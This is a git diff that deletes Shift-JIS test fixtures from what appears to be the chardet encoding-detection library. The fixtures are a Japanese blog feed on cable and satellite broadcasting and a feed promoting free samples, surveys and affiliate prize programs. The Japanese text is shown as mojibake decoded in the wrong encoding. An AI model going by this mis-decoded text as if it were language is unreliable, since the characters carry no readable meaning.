    ‚±‚ָ‚¢‚¾H—t‚¢‚ֱ‚½‚ֶ‚«‚ֽ•’‚ֹ”„‚ֱ‚ִ‚‚µ‚½‚¯‚ַ‚ֻB‚‚ H—tblog‚³‚ס‚ּמ•ס‚ָ‚ּ‚ֵ“P‘‚µn‚‚ִ‚י‚ּ‚ֽ–{“–‚ָ‚ּ‚ֵ‚µ‚ו‚₪B‚‚ Aƒlƒbƒg‚ֵ‚ֽ‚‚¾”ƒ‚¦‚½‚ט‚µ‚‚·‚×A‚»‚ֱ‚¿‚אט‚׉ס‚י‚ּ‚ֽװ‚ּ–ג‘ט‚¾‚ֶv‚¢‚‚·B -
    -
    CATV‹ַ‚ֶ‚µ‚ִ‚ֽ–{“–‚ֽ‚ֶ‚ֱ‚ֶ‚ֶƒfƒWƒ^ƒ‹‰»‚נi‚‚ִƒAƒiƒƒOHT‚נ“P‹‚µ‚½‚¢‚ֶv‚₪‚ס‚ֵ‚·‚ז‚ֻB‚»‚ּ‚‚₪‚בׁˆז‹ע‚ם‚ָ‚¢‚ֵ‘½ƒ`ƒƒƒ“ƒlƒ‹ƒT[ƒrƒX‚ֵ‚«‚י‚µABSƒfƒWƒ^ƒ‹‚א”zM‚ֵ‚«‚י‚µB‚½‚¾Aש‘¶‚ּ‹q‚נ‚ַ‚₪ƒPƒA‚·‚י‚©‚×–ג‘ט‚ֹ‚ָ‚ֱ‚ִ‚¢‚י‚ֶv‚¢‚‚·B‚ ‚ֶAeHITSƒT[ƒrƒX‚ּ•i¿‚×ְ‚ֽ‚‚¾‚ ‚‚ט—ַ‚­‚ָ‚¢(‰ז¿‚א‚»‚₪‚¾‚µAM†§ה“I‚ָ˜b‚ֶ‚µ‚ִ‚א‹q–‘«‚נ–‚½‚¹‚ָ‚¢‚¸‚³‚ס‚ָƒ‚ƒm‚¾‚ֱ‚½‚ט‚·‚י)‚ּ‚א‚½‚‚ח‚¢‚ּˆךˆצ‚©‚א‚µ‚ך‚‚¹‚ס‚ֻBƒXƒJƒp[I110‚ֵ‚ֽƒXƒ^[ƒ`ƒƒƒ“ƒlƒ‹‚׃nƒCƒrƒWƒ‡ƒ“‚נn‚‚‚µ‚½‚µAeHITSƒT[ƒrƒX‚א‚»‚ּ•׃‚ֹ‘־R‚ֵ‚«‚יƒRƒ“ƒeƒ“ƒc”zM‚נl‚¦‚ָ‚¢‚ֶ‚¢‚¯‚ָ‚­‚ָ‚י‚ֵ‚µ‚ו‚₪‚ֻB•’iuƒAƒ“ƒeƒi‰®vu‰‚µ”„‚ט”ּ”„‹ֶv‚ָ‚ַ‚ֶˆ‰‚³‚ך‚יCATV‹ֶE‚אA‚»‚כ‚»‚כ•ֿ‚ם‚ֱ‚ִ‚¢‚©‚ָ‚¢‚ֶ‚¢‚¯‚ָ‚¢‚ֶv‚¢‚‚·B
    -
    -false -
    - - - - -kuchiki - -2005-02-27T04:12:00+09:00 -2005-02-28T10:53:13Z -2005-02-26T19:12:29Z - -tag:blogger.com,1999:blog-5867717.post-110944514935616109 -MicrosoftAƒlƒbƒgo—R‚ּ»•iƒAƒNƒeƒB‚׳[ƒVƒ‡ƒ“‚נ’†~‚ײ - -
    ”N‰‚ּˆ¥A‚ּדA‚±‚ך‚¾‚¯‚½‚ֱ‚ִ‘‚­‹L–‚ֶ‚¢‚₪‚ּ‚×ְ‚ֹƒAƒ‚ָ‚ס‚ֵ‚·‚×A‚»‚±‚ֽ‚ֲ‚ֱ‚±‚‚ָ‚¢‚ֵBƒT[ƒo[ˆ“]‚ֹ”÷‚¢MT‚©‚ָ‚ס‚©“‚ך‚י‚ֲ‚א‚ט‚ֵ€”ץ’†‚ָ‚ּ‚ֵ‚·B
    -
    ‚ֱ‚ֶA‚»‚ך‚ֽ‚¨‚¢‚ֶ‚¢‚ִ‚±‚ּƒjƒ…[ƒX‚ֵ‚·‚זB»ך‚ּlװ‚ׂ©‚ָ‚ט€‚ֻ‚»‚₪‚ָ¨‚¢‚ָ‚ס‚ֵ‚·‚×I ‰ן׀‚ּPC‚ּ–“|‚נ©‚י‚ֶ‚¢‚₪ל‹ֶ‚נA‚²‚­¬‹K–ֽ‚ֵ‚ֽ‚ ‚ט‚‚µ‚½‚ׂµ‚½o±‚ׂ ‚י‚ּ‚נv‚¢‹N‚±‚µ‚ִ‚אA‚±‚ּƒjƒ…[ƒX‚ֵֽ‰‚ֵ‚«‚ָ‚¢–‘װ‚ָ‚ם‚¯‚ֵ‚·‚×A‘וט‚ֽƒ{ƒƒ…[ƒ€ƒ‰ƒCƒZƒ“ƒX”ƒ‚₪‚ֹ‚µ‚ִ‚אA’†¬‹K–ֽ‚ּ‰ן׀‚ֵ‚ֽ•’‚ֹƒƒe[ƒ‹PC”ƒ‚ֱ‚ִ‚‚·‚ז‚ֻBMicrosoft‚א‚‚½v‚¢״‚ֱ‚½‚±‚ֶ‚נ‚·‚י‚ָA‚ֶv‚¢‚‚µ‚½BƒRƒ“ƒVƒ…[ƒ}‚©‚ח‘“–‚ּ”½”­‚נ‹ע‚ח‚¢‚»‚₪‚ֵ‚·‚×A‰‚½‚µ‚ִ‚ַ‚₪‚ָ‚י‚©B
    -
    -’ַ‹LFMicrosoft‚©‚ח”’ט‚·‚י’k˜b‚×o‚½‚ז‚₪‚ֵB‚³‚ִA‚ַ‚₪‚ָ‚ט‚‚·‚©B
    -
    -false -
    - - - -kuchiki - -2005-01-01T11:57:41+09:00 -2005-01-01T03:02:41Z -2005-01-01T03:02:41Z - -tag:blogger.com,1999:blog-5867717.post-110454856162347454 -‚ ‚¯‚‚µ‚ִ‚¨‚‚ֵ‚ֶ‚₪‚²‚´‚¢‚‚· - -
    ד”¼XV‚נ‚·‚ֱ‚©‚ט‚³‚‚ֱ‚ִ‚µ‚‚¢‚‚µ‚½B‚¢‚­‚ֲ‚©ז‚טד‚°‚½‚¢ƒgƒsƒbƒN‚ׂ ‚ֱ‚½‚ּ‚ֵ‚·‚×A””‚ּ–מ‚ֵ’x‚ך‚ִ‚µ‚‚¢‚‚µ‚½B¡”N‚ֽ‚»‚ס‚ָ‚±‚ֶ‚ּ‚ָ‚¢‚ז‚₪ז’£‚ט‚½‚¢‚ֶv‚¢‚‚·B -
    -
    ‚ֶ‚ט‚ ‚¦‚¸¡”N‚ּ–•W‚ֶ‚µ‚ִ‚ֽAך–וblog‚ֶ‚µ‚ִBRAG ZAKATO HEADLINE‚ּ‘¼‚ֹ‚א‚₪ˆך‚ֲA‘‡ƒIƒ^ƒNnמ•סblog‚נ—§‚¿ד‚°‚½‚¢‚ֶl‚¦‚ִ‚¢‚‚·B‚½‚¾Aƒlƒ^‚ֶ‚µ‚ִ‘¼‚ּƒeƒLƒXƒgƒTƒCƒg‚ֶ‚ַ‚₪·•‰»‚×}‚ך‚י‚©‚דן‚µ‚¢‚ֶ‚±‚כ‚ֵ‚·Bˆך‰–{‹ֶƒ‰ƒCƒ^[‚ב‚­blog‚נ•Wװ‚µ‚ִ‚¨‚ט‚‚·‚ּ‚ֵA‚»‚ּ•׃‚ֵ‚¢‚כ‚¢‚כsצכ‚µ‚ִ‚¢‚«‚½‚¢‚ֵ‚·‚ֻB -
    -
    ‚ֶ‚ֹ‚©‚­¡”N‚א‚ז‚כ‚µ‚­‚¨ט‚¢‚µ‚‚·B
    -
    -false -
    - - - - -kuchiki - -2004-11-09T23:03:10+09:00 -2004-11-09T14:03:10Z -2004-11-09T14:03:10Z - -tag:blogger.com,1999:blog-5867717.post-110000899014961161 -ITmedia ƒ‰ƒCƒtƒXƒ^ƒCƒ‹F”ם׀ׂ‚נx‚¦‚יA’n³ƒP[ƒuƒ‹ƒeƒƒr‚ּ€“¬ (‘O•ׂ) - -
    ¬›‚ֽ»’nCATV‚ֵƒ{ƒ‰ƒ“ƒeƒBƒA‚ֶ‚µ‚ִ“­‚¢‚½‚»‚₪‚ֵ‚·B‚»‚ּƒƒ|[ƒgB’n³–§’…ƒƒfƒBƒA‚ֵ‚ ‚יCATV‚ּƒRƒ~ƒ…ƒjƒeƒBƒ`ƒƒƒ“ƒlƒ‹‚ֹ‰½‚ֵׂ‚«‚י‚ּ‚©Bl”‚×­‚ָ‚¢’†•±“¬‚µ‚ִ‚¢‚יp‚×–¾‚ֹƒƒ|[ƒg‚³‚ך‚ִ‚¢‚‚·B
    -
    -false -
    - - - - -kuchiki - -2004-11-07T02:53:42+09:00 -2004-11-06T17:53:42Z -2004-11-06T17:53:42Z - -tag:blogger.com,1999:blog-5867717.post-109976362209432795 -ITmedia ƒ‰ƒCƒtƒXƒ^ƒCƒ‹Fƒ~ƒ…[ƒWƒbƒNƒo[ƒhAVCSƒfƒWƒ^ƒ‹•ת‘—‚נJn@BSƒfƒWƒ^ƒ‹‚ֽ“P‘ - -
    ‚·‚ס‚‚¹‚סAƒtƒHƒ[’x‚ך‚‚µ‚½B‚ֶ‚¢‚₪‚ם‚¯‚ֵBS BIRD‚א“P‘‚ֵ‚·BSNOW WAVE‚ֶ‚©‹\ƒLƒƒƒbƒ`[‚¾‚ֱ‚½‚ּ‚ֵ‚±‚ך‚ֽc”OB‚ג‚ֱ‚ֿ‚ט‰q¯ƒ‰ƒWƒI•ת‘—‚ֽ‚©‚ָ‚ט‹ך‹«‚ֹ—§‚½‚³‚ך‚ִ‚י‚ּ‚ֵ‚µ‚ו‚₪‚©B -
    -
    ˆָ‘O‚©‚חo‚ִ‚י‰\‚ֵ‚אA–¯•תBSƒfƒWƒ^ƒ‹e‹ַ‚ּ‚ג‚ֱ‚ִ‚יƒfƒWƒ^ƒ‹ƒ‰ƒWƒIƒ`ƒƒƒ“ƒlƒ‹‚ֽ‚ֵ‚«‚ך‚־“P‘‚µ‚½‚¢‚ֶ‚¢‚ֱ‚ִ‚י‚ז‚₪‚ָ‚ס‚ֵ‚·‚ז‚ֻB‚א‚¿‚כ‚סƒ`ƒƒƒ“ƒlƒ‹‚ֹ‚ז‚ֱ‚ִ‚©‚ָ‚ט‚ּ‰·“x·‚ׂ ‚י‚ם‚¯‚ֵ‚·‚×ABSQR489‚גLFX488Amother earth‚ ‚½‚ט‚‚ֵ‚ג‚‚ִ‚µ‚‚₪‚ֶ‚©‚ָ‚ט’ֹט‚ֵ‚·B¡ד‚ַ‚₪‚ָ‚ֱ‚ִ‚¢‚­‚ּ‚ֵ‚µ‚ו‚₪‚©ccB
    -
    -false -
    - - - - -kuchiki - -2004-10-21T15:28:48+09:00 -2004-10-21T06:28:48Z -2004-10-21T06:28:48Z - -tag:blogger.com,1999:blog-5867717.post-109834012860768212 -WOWOWA110“xCS‚ֹQ“‚µ12‚©‚ח–{•ת‘—‚נJn - -
    ‚ֶ‚¢‚₪‚ם‚¯‚ֵAƒvƒ‰ƒbƒgƒƒ“‚ּƒvƒ‰ƒbƒgƒz[ƒ€–‹ֶ‚נˆר‚«p‚¢‚¾‚ּ‚ֽ‚ָ‚ס‚ֶWOWOW‚ֵ‚µ‚½B‚±‚ט‚ב‚ ‚ׁ‚ֱ‚­‚ט‚¾B‚µ‚ֱ‚©‚טep055ƒ`ƒƒƒ“ƒlƒ‹‚א–³—¿ƒ`ƒƒƒ“ƒlƒ‹‚ֶ‚µ‚ִE‚ֱ‚ִ‚ ‚ט‚‚·‚×A¡ד‚ּ“WJ‚נl‚¦‚ִ‚ּ‚±‚ֶ‚ָ‚ּ‚ֵ‚µ‚ו‚₪‚©B
    -
    -false -
    - - - - -kuchiki - -2004-10-20T22:53:16+09:00 -2004-10-20T13:58:16Z -2004-10-20T13:58:16Z - -tag:blogger.com,1999:blog-5867717.post-109828069692032451 -~‰J‘־‰•ת‘— - -
    -‘ה•—23†(ƒgƒJƒQ)‚ׂג‚ֱ‚ִ‚«‚ִ‚¨‚ט‚‚·‚ֻB”ם׀‚³‚ך‚½F‚³‚ס‚¨©•‘‚¢\‚µד‚°‚‚·B -
    -
    ‚³‚ִA‚±‚ּ‚ז‚₪‚ָ‹­‚¢‰J‚×~‚ֱ‚ִ‚¢‚י‚ֹ‚ֽ‰q¯•ת‘—‚ּףMף‘װ‚׈«‚­‚ָ‚ט‚‚·B‚»‚₪‚¢‚₪‚ֹs‚ם‚ך‚י‚ּ‚×u~‰J‘־‰•ת‘—v‚ֵ‚·B»ף‚ֵ‚ֽNHK BS-1ABS-2‚×םABS-Hi‚וK—v‚ֹ‰‚¶‚ִs‚ם‚ך‚ִ‚¨‚ט‚‚·Bז‚‚ַƒjƒ…[ƒX10‚ות‘—‚³‚ך‚ִ‚¢‚י‚ֹ~‰J‘־‰•ת‘—‚ֹ‚ָ‚טA‚»‚ּדB-SAT2‚©‚ח‚ּƒ_ƒEƒ“ƒƒ“ƒN‚×®‘S‚ֹ’¾–‚µ‚‚µ‚½B‚¨‚»‚ח‚­B-SAT‚ּלַ§ƒZƒ“ƒ^[‚©‚ח‚ּƒAƒbƒvƒƒ“ƒN‚ֹ–ג‘ט‚×¶‚¶‚½‚ּ‚ֵ‚µ‚ו‚₪B‚µ‚־‚ח‚­‚µ‚ִ•‹A‚µ‚½‚ּ‚ֵA»ף‚ֽN’ֳַ§ƒZƒ“ƒ^[‚נg‚ֱ‚ִ‚¢‚י‚א‚ּ‚ֶv‚ם‚ך‚‚·B
    -
    -false -
    - - - - -kuchiki - -2004-10-20T22:53:10+09:00 -2004-10-20T13:53:10Z -2004-10-20T13:53:10Z - -tag:blogger.com,1999:blog-5867717.post-109828039035252156 -‰q¯•ת‘—‚ֵ‚ם‚¢‚¹‚ֲ‰f‘@x‹’¡A‘S‘‰‚ּ“E”­ - -
    ˆך•”‚ּƒ}ƒjƒA‚ֹ‚ֽ—L–¼‚¾‚ֱ‚½JWAVE(81.3MHz‚ּFMƒ‰ƒWƒI‹ַ‚ֶ‚ֽˆב‚¢‚‚·)‚דE”­‚³‚ך‚‚µ‚½B‚ַ‚₪‚ג‚ח‹’®ׂ‚א”Cˆ׃‚ֵ–מ’®ז‚נף‚¯‚ִ‚¢‚י‚ז‚₪‚ֵ‚·B‚µ‚©‚µA‘•—e‹^‚ֵ–”’‚¢‚ּ‚דd‹C—p•iˆְ‘S–@(”ּ”„‚ּ§ְ)ˆב”½—e‹^‚ֶ‚¢‚₪‚ֶ‚±‚כB‚א‚¿‚כ‚ס‚ם‚¢‚¹‚ֲ}‰ז’ֲ—ס‚ֽ‚µ‚ו‚₪‚ָׂ‚¢‚ס‚ֵ‚·‚×A‚±‚ּ“d‹C—p•iˆְ‘S–@‚ּˆב”½‚ֽ‰½‚©‚ֶv‚ֱ‚½‚חAƒ`ƒ…[ƒi[‚ד¯–@‚ָּ—‚ֹ’ט‚‚½ˆְ‘S«‚נ’ט‚‚½ƒ}[ƒN‚נז“¾‚µ‚ִ‚¨‚ח‚¸A”ּ”„‚µ‚ִ‚ֽ‚¢‚¯‚ָ‚¢‚א‚ּ‚¾‚ֱ‚½‚ֶ‚¢‚₪‚±‚ֶ‚ּ‚ז‚₪‚ֵ‚·B‚א‚¿‚כ‚ס‚±‚ּ—e‹^‚ֵ‚ּ“E”­‚ֽ“ת–{‰‚¾‚ֶv‚¢‚‚·BƒfƒWƒ^ƒ‹ƒ`ƒ…[ƒi[‚ּC‘¯”ֵ‚ָ‚ַ‚אA¡ד‚ֽ‚±‚₪‚¢‚₪–@—‚ֵ“E”­‚µ‚ִ‚¢‚­‚ּ‚ֵ‚µ‚ו‚₪‚©B
    -
    -false -
    -
    diff --git a/chardet/tests/SHIFT_JIS/celeb.lalalu.com.xml b/chardet/tests/SHIFT_JIS/celeb.lalalu.com.xml deleted file mode 100644 index bb4f59b..0000000 --- a/chardet/tests/SHIFT_JIS/celeb.lalalu.com.xml +++ /dev/null @@ -1,554 +0,0 @@ - - - -ƒlƒbƒgdeƒZƒƒu - -2005-12-18T21:16:55Z -–³—¿‚בוD‚«פ@ƒlƒbƒg‚ֵ“¾‚µ‚¿‚ב‚¨‚ֱפ -tag:celeb.lalalu.com,2005://1 -Movable Type -Copyright (c) 2005, majo - -ƒTƒ“ƒvƒ‹ƒuƒƒK[•וWI - -2005-12-18T21:16:55Z -2005-12-18T21:13:30Z -tag:celeb.lalalu.com,2005://1.115 -2005-12-18T21:13:30Z -‚¦IHƒuƒƒO‚נ‘‚­‚¾‚¯‚ֵ‚R‚O‚O‚O‰~‚ּ•סVI –³—¿‚ֵ”z‚ח‚ך‚ִ‚¢‚יƒTƒ“ƒvƒ‹E‹•i‚נ... - -majo - - - -{’‹־ƒiƒVIƒpƒ\ƒRƒ“‚ֵ‚¨d–פ - -‚¦IHƒuƒƒO‚נ‘‚­‚¾‚¯‚ֵ‚R‚O‚O‚O‰~‚ּ•סVI

    - -

    –³—¿‚ֵ”z‚ח‚ך‚ִ‚¢‚יƒTƒ“ƒvƒ‹E‹•i‚נƒuƒƒO‚ֵ׀‰מ‚·‚י‚±‚ֶ‚ֵי“`”ן—p‚נ‰ׂ‚°‚‚·IƒTƒ“ƒvƒ‹•i‚ֽ‚א‚¿‚כ‚ס–³—¿‚ֵ‘—‚ח‚ך‚ִ‚«‚‚·‚ּ‚ֵA”ן—p‚ֽˆך״‚©‚©‚ט‚‚¹‚סBנ‚ּ‡‚₪ƒuƒƒO‚נ‚³‚ך‚ִ‚¢‚י•‚ֵֹ“K‚ָ‘מƒ[ƒN‚ֵ‚·‚זB

    - -

    נ‚ֽˆָ‰÷‚ּ’‚ט‚ֵ‚·B

    - -

    1) ^‚׃Aƒbƒv‚ֵ‚«‚י‚±‚ֶB
    -2)ƒ†ƒj[ƒNƒ†[ƒU[ƒAƒNƒZƒX‚×1“ת500ƒy[ƒWƒrƒ…[ˆָד‚ֵ‚ ‚י‚±‚ֶB
    -3)ˆ“®‚µ‚ִ‚©‚ח3ƒJˆָדo‰‚µ‚ִ‚¢‚יƒuƒƒO‚ֵ‚ ‚י‚±‚ֶB
    -4)‘S‚ִ‚×”ב”»“I‚ָ‹L–‚ֹ‚ָ‚ח‚ָ‚¢‚ז‚₪Aˆ«‚¢ƒTƒ“ƒvƒ‹‚ֵ‚א•]‰¿‚·‚י•”•ׂנ‹L‚·‚י‚±‚ֶB
    -5)‹•i\‚µ‚ƒy[ƒW‚ּURL‚נƒƒ“ƒN‚·‚י‚±‚ֶB

    - -

    c‚ֶ׳‚©‚­‘‚«‚‚µ‚½‚×A•’i’‚ט‰^‰c‚µ‚ִ‚¢‚יƒuƒƒO‚ֵ–³—¿ƒTƒ“ƒvƒ‹‚נg—p‚µ‚½´‘z‚נ‘‚­‚¾‚¯‚ּ‚±‚ֶ‚ֵ‚·B‚ ‚‚ט‚ֹ‚אƒqƒhƒC₪•i‚ֵA–J‚‚י‚ֶ‚±‚כ‚׈ך‚ֲ‚א‚ָ‚¢I‚ֶ‚¢‚₪ך‡‚ֹ‚ֽƒuƒƒO‚ֹf‚µ‚ָ‚­‚ִ‚אƒyƒiƒ‹ƒeƒB‚ֽ‚ ‚ט‚‚¹‚ס‚ּ‚ֵ‚²ˆְS‚נB

    - -

    •סV‚‚ֵ‚ּ—¬‚ך‚ֽˆָ‰÷‚ּ’‚ט‚ֵ‚·B

    - -

    1.‰÷‚ּƒoƒi[‚©‚חA‰^‰c‚µ‚ִ‚¢‚יƒuƒƒO‚נ“o˜^‚·‚יB
    -2.ƒ[ƒJ[‚©‚ח–³—¿ƒTƒ“ƒvƒ‹‚ב—‚ח‚ך‚ִ‚«‚‚·B(ƒ[ƒJ[‚©‚ח’¼‚ּ—X‘—‚ֵ‚ֽ‚ָ‚¢‚ּ‚ֵAדX”ּ‘£‚ּ“d˜b‚ָ‚ַ‚ׂ©‚©‚ֱ‚ִ‚­‚י‚±‚ֶ‚ֽ‚ ‚ט‚‚¹‚ס‚ּ‚ֵ‚²ˆְS‚נ`פ’A‚µA₪•i‚ֹ‚ֲ‚¢‚ִ‚ּƒRƒƒ“ƒg‚×f‚³‚ך‚½ƒuƒƒO‚ֽƒ[ƒJ[‚ֹ’m‚³‚ך‚‚·)
    -3.ƒTƒ“ƒvƒ‹‚נ—p‚µAƒuƒƒO‚ײf‚·‚יB
    -4.ƒuƒƒO‚ֹf‚µ‚½|‚נ’m‚·‚יB
    -5.’S“–ׂ‚׃`ƒFƒbƒN‚µA–ג‘ט‚ָׂ‚¯‚ך‚־3‰c‹ֶ“תˆָ“א‚ֹ•סV‚×x•¥‚ם‚ך‚יB

    - -

    ¦•סV‚ּU‚ט‚‚ֽƒWƒƒƒpƒ“ƒlƒbƒgƒoƒ“ƒN“™A‹גsְ‚ֹ‚ָ‚ט‚‚·BUט”—¿‚א•‰’S‚µ‚ִ‚­‚ך‚‚·פ

    - -

    ]]> - -
    -
    - -MDBƒlƒbƒg ƒp[ƒ\ƒiƒ‹ƒ‚ƒjƒ^[ - -2005-11-22T11:37:14Z -2005-11-22T11:28:33Z -tag:celeb.lalalu.com,2005://1.114 -2005-11-22T11:28:33Z -MDBƒlƒbƒg‚ֽA1962”N‚©‚ח¯’¡‚ג’n•©¡‘ּA–¯װי‹ֶ‚©‚ח‚ּˆֻ—‚נף‚¯‚ִeם’²... - -majo - - - -{ƒAƒ“ƒP[ƒgEƒ‚ƒjƒ^[‚ֵƒ|ƒCƒ“ƒgl“¾ - -MDBƒlƒbƒg‚ֽA1962”N‚©‚ח¯’¡‚ג’n•©¡‘ּA–¯װי‹ֶ‚©‚ח‚ּˆֻ—‚נף‚¯‚ִeם’²¸–‹ֶ‚נ‚µ‚ִ‚«‚½(”)“ת–{”\—¦‹¦‰ן‘‡₪‹†‚ּƒAƒ“ƒP[ƒg’²¸•”–ו‚ֵA“ת–{Z‚ּ13־ˆָד‚ּ•‚ֵAƒpƒ\ƒRƒ“‚ּƒ[ƒ‹ƒAƒhƒƒX‚©Aiƒ‚[ƒhAƒ{[ƒ_ƒtƒHƒ“‚ּƒ[ƒ‹ƒAƒhƒƒX‚ּ‚¢‚¸‚ך‚©‚נ‚ֱ‚ִ‚¢‚י•‚נƒ‚ƒjƒ^[‚ֶ‚µ‚ִ•וW‚µ‚ִ‚¢‚‚·B
    -ƒ‚ƒjƒ^[‚ּ׃—ח‚ֹ‚ֽ2ם—‚ ‚ֱ‚ִA1‚ֲ‚ֽAƒAƒ“ƒP[ƒg‚ֹ“‚¦‚י‚ֶƒ|ƒCƒ“ƒg‚×’™‚‚טA500ƒ|ƒCƒ“ƒgˆָד‚ֹ‚ָ‚י‚ֶA₪•i”‚©—X•ײ‹ְַ‚ײ‚ּ»‹אU‚‚ּ‚ַ‚¿‚ח‚©ף–]‚ּ₪•i‚ֶנ·‚ֵ‚«A‚א‚₪1‚ֲ‚ֽƒAƒ“ƒP[ƒg‚ֹ‰ס“‚µ‚½l‚ּ’†‚©‚ח’‘I‚ֵ₪•i‚ד–‚½‚ט‚‚·B

    - -

    ƒAƒ“ƒP[ƒgƒ‚ƒjƒ^[•וW’†
    -

    ]]> - - - - - - - - -
    ·‹א—¦1P1‰~
    ƒ|ƒCƒ“ƒgl“¾•–@ƒAƒ“ƒP[ƒg
    ƒ|ƒCƒ“ƒgנ·500P`
    ‚¨—F’B׀‰מ -
    ‰^‰c‰ן׀”®‰ן׀ “ת–{”\—¦‹¦‰ן‘‡₪‹†
    - -]]> -
    -
    - -ˆך”­100–‰~ - -2005-11-22T11:33:53Z -2005-11-22T09:19:45Z -tag:celeb.lalalu.com,2005://1.113 -2005-11-22T09:19:45Z -ˆך”­‚P‚O‚O–‰~‚ֽA‰ןˆץ“o˜^דA’טת“I‚ֹ‘—‚ח‚ך‚ִ‚­‚יƒ[ƒ‹‚ּ’†‚ּL‚נƒNƒƒbƒN‚·‚י... - -majo - - - -{g‘ׁ‚ּ‚נ“–‚ִ‚יI - -ˆך”­‚P‚O‚O–‰~‚ֽA‰ןˆץ“o˜^דA’טת“I‚ֹ‘—‚ח‚ך‚ִ‚­‚יƒ[ƒ‹‚ּ’†‚ּL‚נƒNƒƒbƒN‚·‚י‚¾‚¯‚ֵ100–‰~‚ד–‚½‚י‚ֹ‰•וo—ˆ‚י‚m—¦ƒ‚ƒoƒCƒ‹ƒTƒCƒg‚ֵ‚·Bƒpƒ\ƒRƒ“‚©‚חg‘ׁƒ[ƒ‹‚נ“o˜^‚·‚י‚±‚ֶ‚ֵƒGƒ“ƒgƒ[o—ˆ‚‚·B


    -

    ]]> -
    -

    -
    -
    -
    -
    -
    -
    –‹•i»‹א100–‰~
    ƒGƒ“ƒgƒ[•–@ƒ[ƒ‹“אLƒNƒƒbƒN
    ‰^‰c‰ן׀”®‰ן׀ƒtƒ@ƒ“ƒRƒ~ƒ…ƒjƒP[ƒVƒ‡ƒ“ƒY

    -
    -

    ]]> -
    -
    - -ƒP[ƒ^ƒC55 - -2005-12-18T19:37:24Z -2005-11-21T19:22:59Z -tag:celeb.lalalu.com,2005://1.60 -2005-11-21T19:22:59Z -g‘ׁ‚ּƒTƒCƒg‚נƒƒjƒ…[‚©‚ח’T‚·‚ּ‚ֱ‚ִ‹\װ‚א‚©‚©‚י‚µAƒpƒPƒbƒg‘ד‚א‹C‚ֹ‚ָ‚ט‚‚·... - -majo - - - -{g‘ׁ‚ּ‚נ“–‚ִ‚יI - -g‘ׁ‚ּƒTƒCƒg‚נƒƒjƒ…[‚©‚ח’T‚·‚ּ‚ֱ‚ִ‹\װ‚א‚©‚©‚י‚µAƒpƒPƒbƒg‘ד‚א‹C‚ֹ‚ָ‚ט‚‚·‚ז‚ֻB‚¨‰ֶ‚ּƒpƒ\ƒRƒ“‚×ם‘±‚ָ‚ח—]v‚ֹA‚א‚ֱ‚½‚¢‚ָ`‚¢‹C‚ׂµ‚ִ‚µ‚‚¢‚‚·B
    -ƒP[ƒ^ƒC55‚ֽAƒpƒ\ƒRƒ“ד‚ֵg‘ׁƒTƒCƒg‚נץ‚µAƒAƒhƒƒX‚נg‘ׁ‚ֹˆך”­“]‘—‚ֵ‚«‚יƒT[ƒrƒX‚ֵ‚·B
    -c‚ֶA‚±‚±‚‚ֵ‚ָ‚חA•ײ—˜‚ָƒTƒCƒg‚ֶ‚¢‚₪‚¾‚¯‚ָ‚ּ‚ֵ‚·‚×AX‚ֹIg‘ׁ‚ֹ‘—M‚³‚ך‚יURL“]‘—ƒ[ƒ‹‚ֹ‚ֽƒNƒW‚ֲׂ‚¢‚ִ‚¢‚ִA“–‚½‚י‚ֶƒNƒIƒJ[ƒh500‰~•ׂזב‚¦‚‚·I“]‘—‚·‚ך‚־‚·‚י‚‚ַ“–‚½‚יm—¦‚אד‚ׂי‚ּ‚ֵAדט‚ֹ—˜—p‚·‚ך‚־װ‚ֶ‚¨‹א–סo—ˆ‚‚·פ

    ]]> - - - - - - -
    •iƒNƒIƒJ[ƒh\500•×
    ƒGƒ“ƒgƒ[•–@URL“]‘—
    ‰^‰c‰ן׀”®‰ן׀ƒtƒ@ƒ“ƒRƒ~ƒ…ƒjƒP[ƒVƒ‡ƒ“ƒY
    - -]]> -
    -
    - -ƒAƒNƒZƒXƒgƒ[ƒh - -2005-11-19T12:31:59Z -2005-11-19T11:44:56Z -tag:celeb.lalalu.com,2005://1.68 -2005-11-19T11:44:56Z -ƒAƒNƒZƒXƒgƒ[ƒh‚ֽ–ס500׀‚ּLו‚×_–ס‚µ‚ִ‚¢‚י‚ּ‚ֵA‚²©•ּׂƒTƒCƒg‚ּ“א—e‚ֹ‡... - -majo - - - -{ƒAƒtƒBƒƒGƒCƒg‚ֵ‰ׂ‚®I - -ƒAƒNƒZƒXƒgƒ[ƒh‚ֽ–ס500׀‚ּLו‚×_–ס‚µ‚ִ‚¢‚י‚ּ‚ֵA‚²©•ּׂƒTƒCƒg‚ּ“א—e‚ֹ‡‚ֱ‚½L‚ש‚ֲ‚©‚ט‚ג‚·‚¢‚ֶv‚¢‚‚·B‚‚½A‘I‚ס‚¾L‚×f‰ֲ”\‚©‘¦“תR¸‚µ‚ִ‚­‚ך‚י‚ּ‚ֵA‚‚¾‚©‚‚¾‚©‚ֶ‘ׂ‚ֲװ‚ׂ‚ֶ‚ס‚ַ‚ ‚ט‚‚¹‚סBHP‚נל‚י‚ֶ‚«AL‚נ‘I‚ס‚¾“_‚ֵ‚·‚®‚ֹƒy[ƒW‚נל‚ט‚½‚¢‚א‚ּ‚¾‚ֶv‚¢‚‚·B‚¾‚©‚חR¸‚ב‚¢‚ֶ‚¢‚₪‚ּ‚ֽנ‚µ‚¢‚ֵ‚·‚זB

    - -

    2005”N10‚©‚חֵ’בUz‚×\5,000‚©‚ח\1,000‚ֹˆר‚«‰÷‚°‚ח‚ךA¬‰‚נ‘‚­“‚ֶ‚µ‚ִף‚¯ז‚ט‚ג‚·‚­‚ָ‚ט‚‚µ‚½‚µAƒC[ƒoƒ“ƒN‹גsAOˆהZ—F‹גs‚נ•סVףזְ‚ֹw’ט‚·‚י‚ֶAUט”—¿‚×–³—¿‚ֹ‚ָ‚י‚ָ‚ַAƒTƒCƒg‰^‰cׂ‚ֹ‚ֽנ‚µ‚¢ƒƒjƒ…[ƒAƒ‹‚ָׂ‚³‚ך‚‚µ‚½פ
    -

    ]]> - - - - - -
    L“\‚י‚ָ‚חƒAƒNƒZƒXƒgƒ[ƒhI•סV”­¶•–@¬ק•סV / ƒNƒƒbƒN•״
    •סVz(1‚ ‚½‚ט)Lו‚ֹ‚ז‚טˆ‚ָ‚י
    Wvת/U“ת–ˆ––Y/—‚X15“ת•¥
    ֵ’בUz\1,000
    ‰^‰c‰ן׀”®‰ן׀ƒCƒ“ƒ^[ƒXƒy[ƒX
    - - -]]> -
    -
